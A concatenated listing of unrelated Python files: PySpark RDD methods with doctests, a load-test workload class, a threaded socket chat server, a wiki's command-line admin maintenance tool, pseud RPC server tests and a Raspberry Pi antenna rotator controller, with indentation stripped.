shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
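# e.g. if one side is batched at 10 and the other is auto-batched (reported as 0),
# min() gives 0, so both sides are re-serialized with a fixed batch size of 100 before zipping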
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
for partition in range(self.getNumPartitions()):
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# There is a bug in py4j.java_gateway.JavaClass with auto_convert
# https://github.com/bartdag/py4j/issues/161
# TODO: use auto_convert once py4j fix the bug
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
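# e.g. for rdd.map(f).map(g): prev_func applies f over the partition iterator and this
# wrapper then applies g, so both transformations run in a single pass of the Python worker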
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec, self.ctx.pythonVer,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
workload.py
|
import datetime
import threading
import yaml
from .session_group import SessionGroup
class Workload:
def __init__(self, session_cls, config_filename, *args):
with open(config_filename) as config_file:
config = yaml.safe_load(config_file)
now = datetime.datetime.now()
self._session_groups = [
SessionGroup(session_cls, args,
config_filename=sg_spec["sessionConfig"],
no_concurrent_sessions=sg_spec["noConcurrentSessions"],
ramp_up_duration=datetime.timedelta(
seconds=sg_spec["rampUpDuration"]),
ramp_down_duration=datetime.timedelta(
seconds=sg_spec["rampDownDuration"]),
start_at=now + datetime.timedelta(seconds=sg_spec["startTime"]),
stop_at=now + datetime.timedelta(seconds=sg_spec["endTime"]),
burstiness=[{"speed_up_factor": burst_spec["speedUpFactor"],
"start_at": now + \
datetime.timedelta(seconds=burst_spec["startTime"]),
"stop_at": now + \
datetime.timedelta(seconds=burst_spec["endTime"])}
for burst_spec in sg_spec.get("burstiness", [])])
for sg_spec in config]
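# Illustrative shape of the parsed YAML config (an assumption inferred from the keys
# read above; the values are made up):
# [{"sessionConfig": "sessions/browse.yaml", "noConcurrentSessions": 10,
#   "rampUpDuration": 30, "rampDownDuration": 30, "startTime": 0, "endTime": 600,
#   "burstiness": [{"speedUpFactor": 2.0, "startTime": 120, "endTime": 180}]}]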
def start(self):
threads = [threading.Thread(target=sg.start) for sg in self._session_groups]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
simple_server.py
|
import threading
import socket
host = socket.gethostbyname(socket.gethostname())
port = 9090
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # TCP stream socket; listen()/accept() below require SOCK_STREAM
s.bind((host,port))
s.listen(5)
clients = []
nicknames = []
def trans(mess):
for client in clients:
client.send(mess)
def handle_connection(client):
quit = False
print("[ Server Started ]")
while not quit:
try:
message = client.recv(1024)
trans(message)
except:
index = clients.index(client)
nickname = nicknames[index]
clients.remove(client)
nicknames.remove(nickname)
trans(f"{nickname} left the chat.".encode('utf-8'))
quit = True
def main():
print("SERVER POSHOLLL...")
while True:
client, addr = s.accept()
print(f"Connected to {addr}")
client.send("NICK".encode('utf-8'))
nickname = client.recv(1024).decode('utf-8')
nicknames.append(nickname)
clients.append(client)
print(f"Nick is {nickname}")
trans(f"{nickname} joined the chat.".encode('utf-8'))
client.send("You are now connected".encode('utf-8'))
thread = threading.Thread(target= handle_connection, args=(client,))
thread.start()
if __name__ == '__main__':
main()
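# A minimal client sketch (an assumption, not part of this server): open a TCP socket,
# answer the "NICK" prompt, then send and receive chat lines, e.g.
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect((host, port))
#   if c.recv(1024) == b"NICK":
#       c.send("my_nick".encode('utf-8'))
#   c.send("hello everyone".encode('utf-8'))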
|
emergency_tool.py
|
from route.tool.func import *
from route.tool.mark import load_conn2, namumark
try:
set_data = json.loads(open('data/set.json').read())
except:
if os.getenv('NAMU_DB') != None:
set_data = { "db" : os.getenv('NAMU_DB') }
else:
print('DB name (data) : ', end = '')
new_json = str(input())
if new_json == '':
new_json = 'data'
with open('data/set.json', 'w') as f:
f.write('{ "db" : "' + new_json + '" }')
set_data = json.loads(open('data/set.json').read())
print('DB name : ' + set_data['db'])
db_name = set_data['db']
conn = sqlite3.connect(db_name + '.db', check_same_thread = False)
curs = conn.cursor()
load_conn(conn)
print('----')
print('1. Backlink reset')
print('2. reCAPTCHA delete')
print('3. Ban delete')
print('4. Change host')
print('5. Change port')
print('6. Change skin')
print('7. Change password')
print('8. Reset version')
print('9. New DB create')
print('10. Delete set.json')
print('----')
print('Select : ', end = '')
what_i_do = input()
if what_i_do == '1':
def parser(data):
namumark(data[0], data[1], 1)
curs.execute("delete from back")
conn.commit()
curs.execute("select title, data from data")
data = curs.fetchall()
num = 0
for test in data:
num += 1
t = threading.Thread(target = parser, args = [test])
t.start()
t.join()
if num % 10 == 0:
print(num)
elif what_i_do == '2':
curs.execute("delete from other where name = 'recaptcha'")
curs.execute("delete from other where name = 'sec_re'")
elif what_i_do == '3':
print('----')
print('IP or Name : ', end = '')
user_data = input()
if re.search("^([0-9]{1,3}\.[0-9]{1,3})$", user_data):
band = 'O'
else:
band = ''
curs.execute("insert into rb (block, end, today, blocker, why, band) values (?, ?, ?, ?, ?, ?)",
[user_data,
'release',
get_time(),
'tool:emergency',
'',
band
])
curs.execute("delete from ban where block = ?", [user_data])
elif what_i_do == '4':
print('----')
print('Host : ', end = '')
host = input()
curs.execute("update other set data = ? where name = 'host'", [host])
elif what_i_do == '5':
print('----')
print('Port : ', end = '')
port = int(input())
curs.execute("update other set data = ? where name = 'port'", [port])
elif what_i_do == '6':
print('----')
print('Skin\'s name : ', end = '')
skin = input()
curs.execute("update other set data = ? where name = 'skin'", [skin])
elif what_i_do == '7':
print('----')
print('1. sha256')
print('2. sha3')
print('----')
print('Select : ', end = '')
what_i_do = input()  # keep the menu choice as a string so the comparison below matches '1'
print('----')
print('User\'s name : ', end = '')
user_name = input()
print('----')
print('User\'s password : ', end = '')
user_pw = input()
if what_i_do == '1':
hashed = hashlib.sha256(bytes(user_pw, 'utf-8')).hexdigest()
else:
if sys.version_info < (3, 6):
hashed = sha3.sha3_256(bytes(user_pw, 'utf-8')).hexdigest()
else:
hashed = hashlib.sha3_256(bytes(user_pw, 'utf-8')).hexdigest()
curs.execute("update user set pw = ? where id = ?", [hashed, user_name])
elif what_i_do == '8':
curs.execute("update other set data = '00000' where name = 'ver'")
elif what_i_do == '9':
print('----')
print('DB name (data) : ', end = '')
db_name = input()
if db_name == '':
db_name = 'data'
sqlite3.connect(db_name + '.db', check_same_thread = False)
elif what_i_do == '10':
try:
os.remove('data/set.json')
except:
pass
conn.commit()
print('----')
print('OK')
|
test_server.py
|
from __future__ import unicode_literals
import os.path
import threading
import time
from future.builtins import str
import zmq
from zmq.eventloop import ioloop, zmqstream
import tornado.testing
ioloop.install()
def test_server_creation():
from pseud import Server
user_id = b'echo'
server = Server(user_id)
assert server.user_id == user_id
assert server.security_plugin == 'noop_auth_backend'
def test_server_can_bind():
from pseud import Server
user_id = b'echo'
endpoint = 'inproc://{}'.format(__name__).encode()
server = Server(user_id,
security_plugin='noop_auth_backend')
server.bind(endpoint)
def test_server_can_connect():
from pseud import Server
user_id = b'echo'
endpoint = b'tcp://127.0.0.1:5000'
server = Server(user_id,
security_plugin='noop_auth_backend')
server.connect(endpoint)
def test_server_with_its_loop_instance():
from pseud import SyncClient, Server
endpoint = b'ipc:///tmp/test_socket'
def start_server():
server = Server(b'a')
server.bind(endpoint)
server.register_rpc(str.lower)
server.io_loop.add_timeout(server.io_loop.time() + .2,
server.stop)
server.start()
server_thread = threading.Thread(target=start_server)
server_thread.start()
client = SyncClient()
client.connect(endpoint)
result = client.lower('TOTO')
assert result == 'toto'
class ServerTestCase(tornado.testing.AsyncTestCase):
timeout = 2
def make_one_client_socket(self, endpoint):
context = zmq.Context.instance()
req_sock = context.socket(zmq.ROUTER)
req_sock.connect(endpoint)
return req_sock
def make_one_server(self, user_id, endpoint):
from pseud import Server
server = Server(user_id, io_loop=self.io_loop)
server.bind(endpoint)
return server
@tornado.testing.gen_test
def test_job_running(self):
from pseud.common import msgpack_packb
from pseud.interfaces import EMPTY_DELIMITER, OK, VERSION, WORK
from pseud.utils import register_rpc
user_id = b'echo'
endpoint = 'inproc://{}'.format(self.__class__.__name__).encode()
@register_rpc
def job_success(a, b, c, d=None):
time.sleep(.2)
return True
server = self.make_one_server(user_id, endpoint)
socket = self.make_one_client_socket(endpoint)
stream = zmqstream.ZMQStream(socket, io_loop=self.io_loop)
work = msgpack_packb(('job_success', (1, 2, 3), {'d': False}))
yield tornado.gen.Task(stream.send_multipart,
[user_id, EMPTY_DELIMITER, VERSION, b'',
WORK, work])
yield server.start()
response = yield tornado.gen.Task(stream.on_recv)
assert response == [user_id, EMPTY_DELIMITER, VERSION, b'',
OK, msgpack_packb(True)]
server.stop()
@tornado.testing.gen_test
def test_job_not_found(self):
import pseud
from pseud.common import msgpack_packb, msgpack_unpackb
from pseud.interfaces import EMPTY_DELIMITER, ERROR, VERSION, WORK
user_id = b'echo'
endpoint = 'inproc://{}'.format(self.__class__.__name__).encode()
server = self.make_one_server(user_id, endpoint)
socket = self.make_one_client_socket(endpoint)
stream = zmqstream.ZMQStream(socket, io_loop=self.io_loop)
work = msgpack_packb(('thisIsNotAFunction', (), {}))
yield server.start()
yield tornado.gen.Task(stream.send_multipart,
[user_id, EMPTY_DELIMITER, VERSION, b'', WORK,
work])
response = yield tornado.gen.Task(stream.on_recv)
assert response[:-1] == [user_id, EMPTY_DELIMITER, VERSION, b'',
ERROR]
klass, message, traceback = msgpack_unpackb(response[-1])
assert klass == 'ServiceNotFoundError'
assert message == 'thisIsNotAFunction'
# pseud.__file__ might end with .pyc
assert os.path.dirname(pseud.__file__) in traceback
server.stop()
@tornado.testing.gen_test
def test_job_raise(self):
from pseud.common import msgpack_packb, msgpack_unpackb
from pseud.interfaces import ERROR, VERSION, WORK
from pseud.utils import register_rpc
user_id = b'echo'
endpoint = 'inproc://{}'.format(self.__class__.__name__).encode()
@register_rpc
def job_buggy(*args, **kw):
raise ValueError('too bad')
server = self.make_one_server(user_id, endpoint)
socket = self.make_one_client_socket(endpoint)
stream = zmqstream.ZMQStream(socket, io_loop=self.io_loop)
work = msgpack_packb(('job_buggy', (), {}))
yield server.start()
yield tornado.gen.Task(stream.send_multipart,
[user_id, b'', VERSION, b'', WORK, work])
response = yield tornado.gen.Task(stream.on_recv)
assert response[:-1] == [user_id, b'', VERSION, b'', ERROR]
klass, message, traceback = msgpack_unpackb(response[-1])
assert klass == 'ValueError'
assert message == 'too bad'
assert __file__ in traceback
server.stop()
|
rotator.py
|
#! /usr/bin/env python3
"""
Object file for class interfacing with antenna rotator
author: Marion Anderson
date: 2018-06-17
file: rotator.py
"""
from __future__ import absolute_import, print_function
import os
import time
from multiprocessing import Lock, Process
import pigpio
class RotatorClassException(Exception):
"""Provide exceptions for Rotator class"""
pass
class Rotator(object):
"""
Interface to antenna rotator using a stepper motor and a servo.
See this link for PiGPIO documentation:
http://abyz.me.uk/rpi/pigpio/index.html
See Raspberry Pi pinout here:
https://pinout.xyz/#
"""
def __init__(self, pin_az, pin_el, pin_dir, step_angle=1.8, step_delay=5):
"""Create basic antenna rotator instancece
:param pin_az: GPIO pin for incrementing step
:type pin_az: int
:param pin_el: GPIO pin for elevation servo
:type pin_el: int
:param pin_dir: GPIO pin controlling stepper direction
:type pin_dir: int
:param step_angle: Az control step angle in degrees (Default: 1.8)
:type step_angle: float
:param step_delay: Delay between phases in milliseconds (Default: 5)
:type step_delay: float
.. note::
See Raspberry Pi and your motors' documentation for acceptable
parameter values for your equipment.
.. note::
Servos are not attached by default. Run `rotator.attach()` to reserve
system resources.
"""
# Assigning motor params
self.pin_az = pin_az
self.pin_el = pin_el
self.pin_dir = pin_dir
self.step_angle = step_angle
self.step_delay = step_delay
# Determining current position
homepath = os.environ['HOME']
self.statepath = homepath + '/.satcomm/rotator-state.conf'
# Check state file exists and is valid, otherwise assume zero position
if os.path.isfile(self.statepath):
self.statefile = open(self.statepath, 'r')
state = self.statefile.read()
try:
self.az = float(state[state.index('Az:')+3:state.index('El:')])
self.el = float(state[state.index('El:')+3:])
except ValueError:
print('Bad state file! Assuming zero position.')
self.az = 0
self.el = 0
self.statefile.close()
self.statefile = open(self.statepath, 'w')
else:
self.az = 0
self.el = 0
self.statefile = open(self.statepath, 'w') # write first
self._savestate()
# other parameters
self.pi = None # pigpio interface object
self.num_pts = 4 # internal const for _spline_trajectory()
self.attached = False
self.mutex = Lock()
def attach(self):
"""Initiate rotator control interface.
.. note::
See Raspberry Pi pinout here: https://pinout.xyz/#
"""
self.pi = pigpio.pi() # reserving daemon resources
# Set all pins to output
self.pi.set_mode(self.pin_az, pigpio.OUTPUT)
self.pi.set_mode(self.pin_dir, pigpio.OUTPUT)
self.pi.set_mode(self.pin_el, pigpio.OUTPUT)
# Force output low
self.pi.set_servo_pulsewidth(self.pin_el, 0)
self.pi.write(self.pin_az, 0)
self.pi.write(self.pin_dir, 0)
self.attached = True
def detach(self):
"""Stop servo and release PWM resources."""
self.pi.stop() # releases resources used by pigpio daemon
self.statefile.close() # close file stream
self.attached = False
def zero(self):
"""Move rotator to default position: 0deg Az, 0deg El."""
if not self.attached:
raise RotatorClassException('Rotator not attached')
self.write(0, 0)
def calibrate(self):
"""Calibrate rotator by sequentially moving it to
well-defined positions.
"""
input('Press enter to zero rotator: ')
self.zero()
# Azimuth calibration
for az in (90, 180, 270):
input('Press enter to move to {0} degrees Azimuth: '.format(az))
time.sleep(0.01)
self.write(az, 0)
input('Press enter to zero rotator again: ')
time.sleep(0.25)
self.zero()
# Elevation calibration
for el in (-10, 30, 45, 60, 80):
input('Press enter to move to {0} degrees Elevation: '.format(el))
time.sleep(0.01)
self.write(0, el)
# Return to home position
input('Calibration finished!\nPress enter to return to zero: ')
self.zero()
def write(self, az, el):
"""Move rotator to an orientation given in degrees.
Handles input processing and commanding. The individual commands
update the state variables.
:param az: Azimuth angle
:type az: float
:param el: Elevation angle
:type el: float
.. note::
The interal az and el methods process input and save the state
"""
if not self.attached:
raise RotatorClassException('Rotator not attached!')
# Command motors
# use threading to allow simultaneous execution
# TODO: Implement splining
thread_az = Process(target=self._write_az, args=(az,))
thread_el = Process(target=self._write_el, args=(el,))
thread_az.start()
thread_el.start()
thread_az.join()
thread_el.join()
